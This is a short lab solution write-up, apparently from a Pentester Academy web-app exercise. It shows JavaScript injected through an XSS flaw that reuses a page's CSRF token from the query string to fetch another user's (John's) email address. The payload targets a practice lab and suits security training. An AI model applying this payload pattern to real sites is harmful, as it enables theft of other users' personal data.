Skip to content
This repository has been archived by the owner on Jun 2, 2022. It is now read-only.

Latest commit

 

History

History
30 lines (21 loc) · 2 KB

TASK_16.md

File metadata and controls

30 lines (21 loc) · 2 KB

Task 16 [Try Now]

Objectives:

  1. Find John's Email Address using an XSS vulnerability on this page
  2. Display the Email address in the div with id "result"
  3. No Hardcoded values can be used - everything has to be figured out dynamically

Since the CSRF Token value of user can change, we need use some JS oriented way to get the query parameter and send the XHR to the below url

You can use Location.search to get the query paramter dynamically and URLSearchParams to parse them

const qp = new URLSearchParams(location.search);
qp.set("name", "john");

const xhttp = new XMLHttpRequest();

xhttp.onreadystatechange = function () {
  if (this.readyState == 4 && this.status == 200) {
    document.querySelector("#result").innerText = xhttp.responseText;
  }
};
xhttp.open("GET", "http://pentesteracademylab.appspot.com/lab/webapp/jfp/16/email?" + qp.toString(), true);
xhttp.send();

For POC, Click Here